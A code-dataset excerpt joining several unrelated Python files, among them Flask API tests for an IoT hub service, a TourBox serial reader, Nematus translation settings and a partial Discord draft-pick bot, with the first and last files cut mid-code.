except KeyError:
self.memory[instance] = self.machine_type()
| StarcoderdataPython |
1703162 | <reponame>michalkoziara/IoT-RESTful-Webservice
import json
import pytest
from app.main.model.user_group import UserGroup
from app.main.repository.user_group_repository import UserGroupRepository
from app.main.util.auth_utils import Auth
from app.main.util.constants import Constants
def test_get_list_of_user_groups_should_return_list_of_names_when_valid_request(
client,
insert_device_group,
insert_user,
insert_user_group,
get_user_group_default_values
):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
first_user_group_values = get_user_group_default_values()
second_user_group_values = get_user_group_default_values()
third_user_group_values = get_user_group_default_values()
first_user_group_values['name'] = 'Master'
second_user_group_values['name'] = 'second'
third_user_group_values['name'] = 'third'
second_user_group_values['id'] += 1
third_user_group_values['id'] += 2
first_user_group_values['users'] = [user]
first_user_group = insert_user_group(first_user_group_values)
second_user_group = insert_user_group(second_user_group_values)
third_user_group = insert_user_group(third_user_group_values)
first_user_group.users = [user]
device_group.user_groups = [first_user_group, second_user_group, third_user_group]
expected_output_values = [
{'isAssignedTo': True, 'name': 'Master'},
{'isAssignedTo': False, 'name': 'second'},
{'isAssignedTo': False, 'name': 'third'}
]
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert response_data['userGroups'] == expected_output_values
def test_get_list_of_user_groups_should_return_list_of_names_when_valid_request_and_user_is_admin(
client,
insert_device_group,
insert_admin,
insert_user_group,
get_user_group_default_values
):
content_type = 'application/json'
device_group = insert_device_group()
admin = insert_admin()
first_user_group_values = get_user_group_default_values()
second_user_group_values = get_user_group_default_values()
third_user_group_values = get_user_group_default_values()
first_user_group_values['name'] = 'Master'
second_user_group_values['name'] = 'second'
third_user_group_values['name'] = 'third'
second_user_group_values['id'] += 1
third_user_group_values['id'] += 2
first_user_group = insert_user_group(first_user_group_values)
second_user_group = insert_user_group(second_user_group_values)
third_user_group = insert_user_group(third_user_group_values)
device_group.user_groups = [first_user_group, second_user_group, third_user_group]
assert device_group.admin_id == admin.id
expected_output_values = [
{'isAssignedTo': False, 'name': 'Master'},
{'isAssignedTo': False, 'name': 'second'},
{'isAssignedTo': False, 'name': 'third'}
]
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(admin.id, True)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert response_data['userGroups'] == expected_output_values
def test_get_list_of_user_groups_should_return_error_message_when_wrong_token(
client):
content_type = 'application/json'
response = client.get(
'/api/hubs/' + 'device_group_product_key/user-groups',
content_type=content_type,
headers={
'Authorization': 'Bearer test'
}
)
assert response is not None
assert response.status_code == 400
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data['errorMessage'] == "Invalid token."
@pytest.mark.parametrize("state_type, state, state_value", [
('Decimal', 1, 1),
('Boolean', 1, True)
])
def test_get_list_of_executive_devices_should_return_device_info_when_valid_request_and_state_type_not_enum(
state_type, state, state_value,
client,
insert_device_group,
get_executive_device_default_values,
insert_executive_device,
get_executive_type_default_values,
insert_executive_type,
insert_user,
get_user_group_default_values,
insert_user_group,
get_formula_default_values,
insert_formula):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
user_group = insert_user_group(user_group_values)
formula = insert_formula()
executive_device_values = get_executive_device_default_values()
executive_device_values['state'] = state
executive_type_values = get_executive_type_default_values()
executive_type_values['state_type'] = state_type
insert_executive_type(executive_type_values)
executive_device = insert_executive_device(executive_device_values)
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name + '/executive-devices',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert isinstance(response_data, list)
device_info = response_data[0]
assert device_info['name'] == executive_device.name
assert device_info['deviceKey'] == executive_device.device_key
assert device_info['isActive'] == executive_device.is_active
assert device_info['state'] == state_value
assert device_info['isFormulaUsed'] == executive_device.is_formula_used
assert device_info['formulaName'] == formula.name
def test_get_list_of_executive_devices_should_return_device_info_when_valid_request_and_state_type_is_enum(
client,
insert_device_group,
get_executive_device_default_values,
insert_executive_device,
get_executive_type_default_values,
insert_executive_type,
insert_user,
get_user_group_default_values,
insert_user_group,
get_formula_default_values,
insert_formula,
insert_state_enumerator):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
user_group = insert_user_group(user_group_values)
formula = insert_formula()
state_enumerator = insert_state_enumerator()
executive_device_values = get_executive_device_default_values()
executive_device_values['state'] = state_enumerator.number
executive_type_values = get_executive_type_default_values()
executive_type_values['state_type'] = 'Enum'
insert_executive_type(executive_type_values)
executive_device = insert_executive_device(executive_device_values)
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name + '/executive-devices',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert isinstance(response_data, list)
device_info = response_data[0]
assert device_info['name'] == executive_device.name
assert device_info['deviceKey'] == executive_device.device_key
assert device_info['isActive'] == executive_device.is_active
assert device_info['state'] == state_enumerator.text
assert device_info['isFormulaUsed'] == executive_device.is_formula_used
assert device_info['formulaName'] == formula.name
def test_get_list_of_executive_devices_should_return_error_message_when_wrong_token(
client):
content_type = 'application/json'
response = client.get(
'/api/hubs/' + 'device_group_product_key' + '/user-groups/' + 'user_group_name' + '/executive-devices',
content_type=content_type,
headers={
'Authorization': 'Bearer test'
}
)
assert response is not None
assert response.status_code == 400
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data['errorMessage'] == "Invalid token."
@pytest.mark.parametrize("reading_type, reading, reading_value", [
('Decimal', 1, 1),
('Boolean', 1, True)
])
def test_get_list_of_sensors_should_return_sensors_info_when_valid_request_and_state_type_not_enum(
reading_type, reading, reading_value,
client,
insert_device_group,
get_sensor_default_values,
insert_sensor,
get_sensor_reading_default_values,
insert_sensor_reading,
get_sensor_type_default_values,
insert_sensor_type,
insert_user,
get_user_group_default_values,
insert_user_group
):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
user_group = insert_user_group(user_group_values)
reading_info = get_sensor_reading_default_values()
reading_info['value'] = reading
insert_sensor_reading(reading_info)
sensor_type_values = get_sensor_type_default_values()
sensor_type_values['reading_type'] = reading_type
insert_sensor_type(sensor_type_values)
sensor = insert_sensor()
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name + '/sensors',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert isinstance(response_data, list)
device_info = response_data[0]
assert device_info['name'] == sensor.name
assert device_info['deviceKey'] == sensor.device_key
assert device_info['isActive'] == sensor.is_active
assert device_info['sensorReadingValue'] == reading_value
def test_get_list_of_sensors_should_return_sensors_info_when_valid_request_and_state_type_is_enum(
client,
insert_device_group,
get_sensor_default_values,
insert_sensor,
get_sensor_reading_default_values,
insert_sensor_reading,
get_sensor_type_default_values,
insert_sensor_type,
insert_sensor_reading_enumerator,
insert_user,
get_user_group_default_values,
insert_user_group):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
user_group = insert_user_group(user_group_values)
reading_info = get_sensor_reading_default_values()
reading_info['value'] = 1
insert_sensor_reading(reading_info)
sensor_type_values = get_sensor_type_default_values()
sensor_type_values['reading_type'] = 'Enum'
insert_sensor_type(sensor_type_values)
reading_enumerator = insert_sensor_reading_enumerator()
sensor = insert_sensor()
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name + '/sensors',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert isinstance(response_data, list)
device_info = response_data[0]
assert device_info['name'] == sensor.name
assert device_info['isActive'] == sensor.is_active
assert device_info['sensorReadingValue'] == reading_enumerator.text
def test_get_list_of_sensors_should_return_error_message_when_wrong_token(
client):
content_type = 'application/json'
response = client.get(
'/api/hubs/' + 'device_group_product_key' + '/user-groups/' + 'user_group_name' + '/sensors',
content_type=content_type,
headers={
'Authorization': 'Bearer test'
}
)
assert response is not None
assert response.status_code == 400
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data['errorMessage'] == "Invalid token."
def test_delete_user_group_should_delete_user_group_when_valid_request(
client,
insert_device_group,
get_sensor_default_values,
insert_admin,
insert_user_group,
insert_sensor_type):
content_type = 'application/json'
device_group = insert_device_group()
admin = insert_admin()
user_group = insert_user_group()
user_group_name = user_group.name
response = client.delete(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name,
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(admin.id, True)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
user_group_in_db = UserGroupRepository.get_instance().get_user_group_by_name_and_device_group_id(
user_group_name,
device_group.id)
assert user_group_in_db is None
def test_create_user_group_should_create_user_group_in_device_group_when_valid_request(
client,
insert_device_group,
get_user_default_values,
insert_user,
get_user_group_default_values,
insert_user_group):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
insert_user_group(user_group_values)
user_group_name = 'test user group name'
user_group_password = '<PASSWORD>'
response = client.post(
'/api/hubs/' + device_group.product_key + '/user-groups',
data=json.dumps(
{
"groupName": user_group_name,
"password": <PASSWORD>,
}
),
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response
assert response.status_code == 201
response_data = json.loads(response.data.decode())
assert not response_data
user_group = UserGroup.query.filter(UserGroup.name == user_group_name).all()
assert user_group
def test_create_user_group_should_return_error_message_when_invalid_request_data(
client,
insert_user):
content_type = 'application/json'
user = insert_user()
response = client.post(
'/api/hubs/' + 'not product key' + '/user-groups',
data=json.dumps(
{
"groupName": 'user_group_name'
}
),
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert response_data
assert 'errorMessage' in response_data
assert response_data['errorMessage'] == Constants.RESPONSE_MESSAGE_BAD_REQUEST
def test_create_user_group_should_return_error_message_when_invalid_request(
client,
insert_user):
content_type = 'application/json'
user = insert_user()
response = client.post(
'/api/hubs/' + 'not product key' + '/user-groups',
data=json.dumps(
{
"groupName": 'user_group_name',
"password": '<PASSWORD>',
}
),
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert response_data
assert 'errorMessage' in response_data
assert response_data['errorMessage'] == Constants.RESPONSE_MESSAGE_PRODUCT_KEY_NOT_FOUND
def test_create_user_group_should_return_error_message_when_user_not_authorized(client):
content_type = 'application/json'
response = client.post(
'/api/hubs/' + 'product_key' + '/user-groups',
data=json.dumps(
{
"groupName": 'user_group_name',
"password": '<PASSWORD>',
}
),
content_type=content_type,
)
assert response
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert response_data
assert 'errorMessage' in response_data
assert response_data['errorMessage'] == Constants.RESPONSE_MESSAGE_USER_NOT_DEFINED
def test_create_user_group_should_return_no_privileges_error_message_when_user_is_admin(
client, insert_admin):
content_type = 'application/json'
admin = insert_admin()
response = client.post(
'/api/hubs/' + 'product_key' + '/user-groups',
data=json.dumps(
{
"groupName": 'user_group_name',
"password": '<PASSWORD>',
}
),
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(admin.id, True)
}
)
assert response
assert response.status_code == 403
response_data = json.loads(response.data.decode())
assert response_data
assert 'errorMessage' in response_data
assert response_data['errorMessage'] == Constants.RESPONSE_MESSAGE_USER_DOES_NOT_HAVE_PRIVILEGES
| StarcoderdataPython |
3280054 | <reponame>AlexandraAlter/tourboxneo
from dataclasses import dataclass
from evdev import UInput, ecodes as e
from pathlib import Path
import serial
import logging
logger = logging.getLogger(__name__)
RELEASE_MASK = 0x80
REVERSE_MASK = 0x40
BUTTON_MASK = ~(RELEASE_MASK | REVERSE_MASK)
UEVENT_PRODUCT = 'PRODUCT=2e3c/5740/200'
@dataclass
class Button:
group: str
key: str
byte: int
def __repr__(self):
byte = hex(self.byte)
return f'Button({self.group}.{self.key} b{byte})'
BUTTONS = [
Button('prime', 'side', 0x01),
Button('prime', 'top', 0x02),
Button('prime', 'tall', 0x00),
Button('prime', 'short', 0x03),
Button('prime', 'tall_x2', 0x18),
Button('prime', 'side_x2', 0x21),
Button('prime', 'top_x2', 0x1f),
Button('prime', 'short_x2', 0x1c),
Button('prime', 'side_top', 0x20),
Button('prime', 'side_tall', 0x1b),
Button('prime', 'side_short', 0x1e),
Button('prime', 'top_tall', 0x19),
Button('prime', 'top_short', 0x1d),
Button('prime', 'tall_short', 0x1a),
Button('kit', 'up', 0x10),
Button('kit', 'down', 0x11),
Button('kit', 'left', 0x12),
Button('kit', 'right', 0x13),
Button('kit', 'c1', 0x22),
Button('kit', 'c2', 0x23),
Button('kit', 'tour', 0x2a),
Button('kit', 'side_up', 0x14),
Button('kit', 'side_down', 0x15),
Button('kit', 'side_left', 0x16),
Button('kit', 'side_right', 0x17),
Button('kit', 'top_up', 0x2b),
Button('kit', 'top_down', 0x2c),
Button('kit', 'top_left', 0x2d),
Button('kit', 'top_right', 0x2e),
Button('kit', 'tall_c1', 0x24),
Button('kit', 'tall_c2', 0x25),
Button('kit', 'short_c1', 0x39),
Button('kit', 'short_c2', 0x3a),
Button('knob', 'press', 0x37),
Button('knob', 'turn', 0x04),
Button('knob', 'side_turn', 0x08),
Button('knob', 'top_turn', 0x07),
Button('knob', 'tall_turn', 0x05),
Button('knob', 'short_turn', 0x06),
Button('scroll', 'press', 0x0a),
Button('scroll', 'turn', 0x09),
Button('scroll', 'side_turn', 0x0e),
Button('scroll', 'top_turn', 0x0d),
Button('scroll', 'tall_turn', 0x0b),
Button('scroll', 'short_turn', 0x0c),
Button('dial', 'press', 0x38),
Button('dial', 'turn', 0x0f),
]
BYTEMAP = {b.byte: b for b in BUTTONS}
MAP = {
'prime': {b.key: b
for b in BUTTONS if b.group == 'prime'},
'kit': {b.key: b
for b in BUTTONS if b.group == 'kit'},
'knob': {b.key: b
for b in BUTTONS if b.group == 'knob'},
'scroll': {b.key: b
for b in BUTTONS if b.group == 'scroll'},
'dial': {b.key: b
for b in BUTTONS if b.group == 'dial'},
}
class Reader:
def __init__(self, dev_path):
if dev_path is not None and not dev_path.exists():
logger.warn('Specified device does not exist')
dev_path = None
if dev_path is None:
logger.info('Searching for device')
for d in Path('/sys/class/tty/').glob('*ACM*'):
uevent = d.joinpath('device/uevent').read_text()
if UEVENT_PRODUCT in uevent:
dev_path = Path('/dev').joinpath(d.name)
logger.info('Identified device %s', dev_path)
break
if dev_path is None or not dev_path.exists():
raise RuntimeError('Could not find a device')
self.dev_path = dev_path
self.serial = None
def __enter__(self):
logger.info('Starting TourBox Reader')
self.serial = serial.Serial(str(self.dev_path), timeout=2)
return self
def __exit__(self, exc_type, exc_value, traceback):
logger.info('Halting TourBox Reader')
def tick(self):
try:
bs = self.serial.read()
except serial.SerialException:
msg = 'Can\'t read: %s, maybe unplugged or no permission?'
logging.error(msg, self.dev_path)
raise RuntimeError('Lost device')
if len(bs) > 0:
b = bs[0]
btn = BYTEMAP.get(b & BUTTON_MASK, None)
if btn is None:
logger.warn(f'Unknown byte {hex(b)}')
release = bool(b & RELEASE_MASK)
reverse = bool(b & REVERSE_MASK)
logger.debug('Read: %s, rel=%s, rev=%s', btn, release, reverse)
return (btn, release, reverse)
| StarcoderdataPython |
3299089 | <filename>JumpscaleLibs/tools/markdowndocs/macros/gpdf.py
import re
DOC_INFO_REGEX = r"([a-zA-Z]+)\/d\/([a-zA-Z0-9-_]+)"
def gpdf(doc, link, **kwargs):
"""generate pdf download link from google drive link to document or presentation
:param doc: current document
:type doc: Doc
:param link: full url of document or presentation
:type link: str
:return: a download link to document/presentation as pdf
:rtype: str
"""
j = doc.docsite._j
link = link.strip()
match = re.search(DOC_INFO_REGEX, link)
if match:
doc_type, file_id = match.groups()
if doc_type not in ("document", "spreadsheets", "presentation"):
raise j.exceptions.Value(f"{doc_type} is not a supported document type ()")
pdf_link = f"/wiki/gdrive/{doc_type}/{file_id}"
# normal markdown links will be resolved by docsify, won't work
return f"""```inline_html
<a href="{pdf_link}">download as pdf</a>
```
"""
raise j.exceptions.Value(f"cannot extract document type of id from an invalid link '{link}''")
| StarcoderdataPython |
1601111 | '''
Created on 27 Jul 2017
@author: julianporter
'''
import traceback
from numbers import Number
import logging
class OSGridError(Exception):
def __init__(self,message,inner=None):
super(OSGridError,self).__init__()
self.message='OSGridConverter error: {}'.format(message)
self.inner=inner
self.traceback=traceback.format_stack()
def __str__(self):
return self.message
def areNumbers(args):
return all([isinstance(x,Number) and not isinstance(x,bool) for x in args])
class Log(object):
def __init__(self,level=None):
self.logger=logging.getLogger()
if level:
handler=logging.StreamHandler()
self.logger.setLevel(level)
else:
handler=logging.NullHandler()
self.logger.addHandler(handler)
def debug(self,*args):
self.logger.debug(args[0].format(*args[1:]))
def info(self,*args):
self.logger.info(args[0].format(*args[1:]))
def warning(self,*args):
self.logger.warning(args[0].format(*args[1:]))
def error(self,*args):
self.logger.error(args[0].format(*args[1:]))
def exception(self,e):
self.logger.error('{} {}',e,traceback.format_exc())
log=Log()
| StarcoderdataPython |
3223790 | import os
from typing import Any
from pydantic import BaseSettings as Settings
from pydantic import EmailStr, validator
from fastapi_mail.schemas import validate_path
from jinja2 import Environment, FileSystemLoader
class ConnectionConfig(Settings):
MAIL_USERNAME: str
MAIL_PASSWORD: str
MAIL_PORT: int = 465
MAIL_SERVER: str
MAIL_TLS: bool = False
MAIL_SSL: bool = True
MAIL_DEBUG: int = 1
MAIL_FROM: EmailStr
TEMPLATE_FOLDER: Any = None
@validator("TEMPLATE_FOLDER", pre=True)
def create_template_engine(cls, v):
template_env = None
if isinstance(v, str):
if os.path.isdir(v) and os.access(v, os.R_OK) and validate_path(v):
template_env = Environment(
loader=FileSystemLoader(v))
return template_env
| StarcoderdataPython |
177383 | import uasyncio as asyncio
class LedStripController:
def __init__(self, enc, button_pin, fader_pins):
''' enc should be an instance of Encoder.
button_pin is expected to be an instance of machine.Pin.
fader_pins is expected to be an iterable of machine.PWM's.
'''
self.enc = enc
self.is_on = False
self.enc_cur_val = 511
self.fader_target_val = 0
self.button_pin = button_pin
self.fader_pins = fader_pins
self.button_pressed = False
for fader in self.fader_pins:
fader.duty(0)
def toggle_led_state(self):
self.button_pressed = True
print('Button pressed!')
async def switch_loop(self, enc):
self.button_pressed = False
while True:
if self.button_pressed:
# TODO should removedebouncing; should be handled outside of this class.
# Shouldn't care that it's a button that triggers the change...
asyncio.sleep_ms(100) # Debounce duration
# Only alter state if button still pressed (not a transient event)
if not self.button_pin.value():
if self.is_on:
# Turning off, fading out
print('Turning off at {}'.format(self.enc_cur_val))
self.fader_target_val = 0
else:
# Turning on, fading in
print('Turning on at {}'.format(self.enc_cur_val))
self.fader_target_val = enc._value = self.enc_cur_val
self.button_pressed = False
self.is_on = not self.is_on
await asyncio.sleep_ms(100)
async def encoder_loop(self, enc):
oldval = 0
while True:
if self.is_on:
self.enc_cur_val = enc.value
enc.cur_accel = max(0, enc.cur_accel - enc.accel)
if oldval != self.enc_cur_val:
print('Old enc. val: %i, new enc. val: %i' % (oldval, self.enc_cur_val))
self.fader_target_val = oldval = self.enc_cur_val
await asyncio.sleep_ms(50)
async def fader_loop(self):
FADER_MAX_STEP = 5
FADER_DELAY_MS = 5
fader_cur_val = 0
while True:
if self.fader_target_val > fader_cur_val:
step = min(FADER_MAX_STEP, self.fader_target_val - fader_cur_val)
elif self.fader_target_val < fader_cur_val:
step = -min(FADER_MAX_STEP, fader_cur_val - self.fader_target_val)
else:
step = 0
fader_cur_val += step
if abs(step) > 0:
for fader in self.fader_pins:
fader.duty(fader_cur_val)
await asyncio.sleep_ms(FADER_DELAY_MS)
| StarcoderdataPython |
94358 | def save_file(contents):
with open("path_to_save_the_file.wav", 'wb') as f:
f.write(contents)
return "path_to_save_the_file.wav"
| StarcoderdataPython |
179929 | <filename>nematus/settings.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Configuration containers.
"""
import uuid
class DecoderSettings(object):
def __init__(self, parsed_console_arguments=None):
"""
Decoder settings are initialised with default values, unless parsed
console arguments as returned by a `ConsoleInterface`'s `parse_args()`
method are provided.
"""
self.models = []
self.num_processes = 1
self.device_list = []
self.verbose = False
self.num_attentions = 1
self.num_encoders = 1
self.multisource = None
if parsed_console_arguments:
self.update_from(parsed_console_arguments)
def update_from(self, parsed_console_arguments):
"""
Updates decoder settings based on @param parsed_console_arguments,
as returned by a `ConsoleInterface`'s `parse_args()` method.
"""
args = parsed_console_arguments
self.models = args.models
self.num_processes = args.p
self.device_list = args.device_list
self.verbose = args.v
# multisource
if not hasattr(args, 'aux_input'):
self.multisource = False
self.num_inputs = 1
elif len(args.aux_input) > 0:
self.multisource = True
self.num_inputs = len(args.aux_input) + 1
else:
self.multisource = False
self.num_inputs = 1
class TranslationSettings(object):
ALIGNMENT_TEXT = 1
ALIGNMENT_JSON = 2
def __init__(self, parsed_console_arguments=None):
"""
Translation settings are initialised with default values, unless parsed
console arguments as returned by a `ConsoleInterface`'s `parse_args()`
method are provided.
"""
self.request_id = uuid.uuid4()
self.beam_width = 5
self.normalization_alpha = 0.0
self.char_level = False
self.n_best = 1
self.suppress_unk = False
self.get_word_probs = False
self.get_alignment = False
self.alignment_type = None
self.alignment_filename = None
self.aux_alignment_filenames = []
self.get_search_graph = False
self.search_graph_filename = None
self.multisource = False
self.predicted_trg = False
if parsed_console_arguments:
self.update_from(parsed_console_arguments)
def update_from(self, parsed_console_arguments):
"""
Updates translation settings based on @param parsed_console_arguments,
as returned by a `ConsoleInterface`'s `parse_args()` method.
"""
args = parsed_console_arguments
self.beam_width = args.k
self.normalization_alpha = args.n
self.char_level = args.c
self.n_best = args.n_best
self.suppress_unk = args.suppress_unk
self.get_word_probs = args.print_word_probabilities
if args.output_alignment:
self.get_alignment = True
self.alignment_filename = args.output_alignment
# alignments for multiple inputs
for i in range(len(args.aux_input)):
self.aux_alignment_filenames.append(file(args.output_alignment.name + '_aux'+str(i+1), 'w'))
if args.json_alignment:
self.alignment_type = self.ALIGNMENT_JSON
else:
self.alignment_type = self.ALIGNMENT_TEXT
else:
self.get_alignment = False
if args.search_graph:
self.get_search_graph = True
self.search_graph_filename = args.search_graph
else:
self.get_search_graph = False
self.search_graph_filename = None
if args.aux_input is not None:
self.multisource = True
else:
self.multisource = False
self.predicted_trg = args.predicted_trg
class ServerSettings(object):
def __init__(self, parsed_console_arguments=None):
"""
Server settings are initialised with default values, unless parsed
console arguments as returned by a `ConsoleInterface`'s `parse_args()`
method are provided.
"""
self.style = "Nematus" #TODO: use constant
self.host = "localhost"
self.port = 8080
if parsed_console_arguments:
self.update_from(parsed_console_arguments)
def update_from(self, parsed_console_arguments):
"""
Updates decoder settings based on @param parsed_console_arguments,
as returned by a `ConsoleInterface`'s `parse_args()` method.
"""
args = parsed_console_arguments
self.style = args.style
self.host = args.host
self.port = args.port
| StarcoderdataPython |
1637926 | <reponame>bjester/project-leda<gh_stars>0
#!/usr/bin/python3
import os
import time
import sys
from argparse import ArgumentParser
from leda import leda, factory, debug
print("Python version " + sys.version)
# RPi cam
cam_period = 5 # in seconds
# Daughter (sensor) board over twi
twi_period = 1 # in seconds
twi_path = "/dev/ttyACM0" # db appears here by default
twi_baud = 38400
twi_timeout = 1 # in seconds
gps_host = 'localhost'
gps_port = '2947'
parser = ArgumentParser()
parser.add_argument('--debug', dest='debug', action='store_true')
parser.set_defaults(debug=False)
args = parser.parse_args()
#########################################################
# ensure only one instance of Project Leda runs at once
if __name__ == "__main__":
# create directory for this run
output_dir = "/home/pi/project-leda/Deployment_" + time.asctime(time.localtime()).replace(' ', '_').replace(':', '') + "/"
output_pic_dir = output_dir + "pictures/"
os.mkdir(output_dir)
os.mkdir(output_pic_dir)
debugger = debug.Logger(output_dir, args.debug)
leda_factory = factory.Factory(debugger)
# init project leda
projectLeda = leda.Leda(
leda_factory.build_camera(output_pic_dir),
cam_period,
leda_factory.build_uart(twi_path, twi_baud, twi_timeout),
twi_period,
leda_factory.build_gps(gps_host, gps_port),
leda_factory.build_logger(output_dir),
debugger)
# launch the system
print("Launching Leda")
projectLeda.infinite_loop()
| StarcoderdataPython |
3353110 | from discord.ext import commands
import sys
import logging
from interface import DisrapidDb
from helpers import YouTubeHelper
from pythonjsonlogger import jsonlogger
from datetime import datetime
ADMINISTRATOR = 0x00000008
class Disrapid(commands.Bot):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# init database
try:
self.config = kwargs.pop("config")
self.db = DisrapidDb(host=self.config.db_host,
user=self.config.db_user,
passwd=self.config.db_pass,
name=self.config.db_name)
if self.config.youtube:
self.youtube = YouTubeHelper(self.config.developer_key)
except Exception as e:
logging.fatal(e)
sys.exit(1)
def load_extension(self, extension):
# logging override
super().load_extension(extension)
async def logout(self):
# override logout sequence, exit db connection first
# await self.db.close()
await super().logout()
class DisrapidConfig:
def __init__(self, *args, **kwargs):
self.db_host = kwargs.pop("db_host")
self.db_name = kwargs.pop("db_name")
self.db_pass = kwargs.pop("db_pass")
self.db_user = kwargs.pop("db_user")
self.schema_version = kwargs.pop("schema_version")
self.do_full_sync = False
class DisrapidLoggingFormatter(jsonlogger.JsonFormatter):
def add_fields(self, log_record, record, message_dict):
super(DisrapidLoggingFormatter, self).add_fields(
log_record,
record,
message_dict
)
log_record['@timestamp'] = datetime.now().isoformat()
log_record['level'] = record.levelname
log_record['logger'] = record.name
| StarcoderdataPython |
3321288 | from model.project import Project
def test_del_project(app, config):
app.session.login("administrator", "root")
app.project.open_project()
if len(app.project.get_project_list()) == 0:
app.project.create()
app.project.fill_form_project(Project(name_project=str("test"), status="stable",
description="test", view_status="public"))
app.project.confirm_add_project()
old_list_project = app.soap.get_project_list(username=config['web']["username"], password=config['web']["password"], baseUrl=config['web']['baseUrl'])
app.project.del_project()
app.project.open_project()
new_list_project = app.soap.get_project_list(username=config['web']["username"], password=config['web']["password"], baseUrl=config['web']['baseUrl'])
assert len(old_list_project) - 1 == len(new_list_project)
old_list_project[0:1] = []
assert old_list_project == new_list_project | StarcoderdataPython |
160590 | <filename>sandcastle/__init__.py<gh_stars>1-10
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
from sandcastle.api import Sandcastle, VolumeSpec, MappedDir # NOQA
from sandcastle.exceptions import ( # NOQA
SandcastleException,
SandcastleTimeoutReached,
SandcastleCommandFailed,
SandcastleExecutionError,
)
| StarcoderdataPython |
1680852 | <filename>draft.py<gh_stars>0
from discord import *
import asyncio
import json
import random
from session import DraftSession, DraftState
from errors import *
client: Client = Client()
COMMAND_PREFIX = "!"
SESSIONS = {}
CAPTAINS = {}
DRAFT_CHANNEL_ID = 698678134085779466
GUILD = 599028066991341578
NAIL_BOT_ID = 704663040682885134
# dio's draft_channel: 698678134085779466
# GVD's draft_channel: 696551201642119208
async def main() -> None:
global COMMANDS
# List of commands and their associated methods
COMMANDS = {
"help": help_command,
"draft": draft_command,
"join": join_command,
"ban": pick_command,
"pick": pick_command,
"exit": exit_command,
}
# Open secrets file and start with bot token
token = ""
with open("token.secret", "r") as f:
token = f.read()
if token != "":
await client.start(token)
@client.event
async def on_ready() -> None:
reset_draft_channel = False
async for message in client.get_channel(DRAFT_CHANNEL_ID).history():
if not message.author.bot or reset_draft_channel:
await message.delete()
elif message.embeds:
if message.embeds[0].color.value == 16753152:
await message.delete()
print("Bot Online")
@client.event
async def on_message(message: Message) -> None:
if message.author.id == NAIL_BOT_ID:
await nailbot(message)
if message.author.bot:
return
if not message.content:
return
if not message.channel.id == DRAFT_CHANNEL_ID and type(message.channel) is not DMChannel:
return
print(message.author, message.content)
content = message.content;
if message.channel.id == DRAFT_CHANNEL_ID:
await message.delete()
if content[0] == COMMAND_PREFIX:
await set_channel(message)
command = content.split(' ')[0][1:].lower()
if command in COMMANDS.keys():
await COMMANDS[command](message)
else:
channel = message.author.dm_channel
await channel.send("!" + command + " is not recognized as a command")
# set channel, check if a dm exists or create dm
async def set_channel(message: Message) -> None:
if not message.author.dm_channel:
await message.author.create_dm()
async def help_command(message: Message) -> None:
await message.author.dm_channel.send(
"`!help` : pull up this very dialog\n" \
"`!draft` : start a draft\n" \
"`!join draft id` : join a draft\n" \
"`!ban champ` : during ban phase used to ban a champion\n" \
"`!pick champ` : during pick phase used to pick a champion\n" \
"`!exit` : exit the current draft you are in"
)
async def draft_command(message: Message) -> None:
channel = message.author.dm_channel
draft_channel = client.get_channel(DRAFT_CHANNEL_ID)
